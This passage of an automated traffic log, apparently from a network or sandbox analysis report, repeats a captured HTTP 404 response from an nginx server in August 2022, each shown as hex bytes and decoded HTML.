Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a 